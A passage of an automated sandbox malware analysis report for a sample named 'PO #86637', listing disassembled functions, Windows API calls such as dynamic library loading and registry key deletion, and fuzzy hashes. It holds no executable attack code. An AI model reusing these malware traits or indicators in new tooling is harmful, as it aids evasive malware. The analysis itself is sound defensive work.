                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: ICMP.DLL$IcmpCreateFile
                      • API String ID: 2574300362-275556492
                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                      Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: ICMP.DLL$IcmpSendEcho
                      • API String ID: 2574300362-58917771
                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                      Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2574300362-4033151799
                      • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                      • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                      • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                      • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                      Function 00430DC1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                      • API String ID: 2574300362-1816364905
                      • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                      • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
                      • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
                      • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
                      Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                      • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                      • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                      • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                      Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 0047950F
                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                      • VariantClear.OLEAUT32(?), ref: 00479650
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$AllocClearCopyInitString
                      • String ID:
                      • API String ID: 2808897238-0
                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                      Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                      • __itow.LIBCMT ref: 004699CD
                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                      • __itow.LIBCMT ref: 00469A97
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$__itow
                      • String ID:
                      • API String ID: 3379773720-0
                      • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                      • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                      Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                      • ScreenToClient.USER32(?,?), ref: 00449A80
                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$ClientMoveRectScreen
                      • String ID:
                      • API String ID: 3880355969-0
                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                      Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                      • String ID:
                      • API String ID: 2782032738-0
                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                      Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                      Download Yara Rule
                      APIs
                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                      • GetWindowRect.USER32(?,?), ref: 00441722
                      • PtInRect.USER32(?,?,?), ref: 00441734
                      • MessageBeep.USER32(00000000), ref: 004417AD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                      Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateHardLink$DeleteErrorFileLast
                      • String ID:
                      • API String ID: 3321077145-0
                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                      Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                      • __isleadbyte_l.LIBCMT ref: 004208A6
                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                      Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                      Download Yara Rule
                      APIs
                      • GetParent.USER32(?), ref: 004503C8
                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Proc$Parent
                      • String ID:
                      • API String ID: 2351499541-0
                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                      Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                      Download Yara Rule
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                      • TranslateMessage.USER32(?), ref: 00442B01
                      • DispatchMessageW.USER32(?), ref: 00442B0B
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Message$Peek$DispatchTranslate
                      • String ID:
                      • API String ID: 1795658109-0
                      • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                      • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                      • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                      • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                      Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                      • GetCaretPos.USER32(?), ref: 004743B2
                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                      • GetForegroundWindow.USER32 ref: 004743EE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                      • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                      • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                      • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                      Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                      • _wcslen.LIBCMT ref: 00449519
                      • _wcslen.LIBCMT ref: 00449526
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend_wcslen$_wcspbrk
                      • String ID:
                      • API String ID: 2886238975-0
                      • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                      • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                      • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
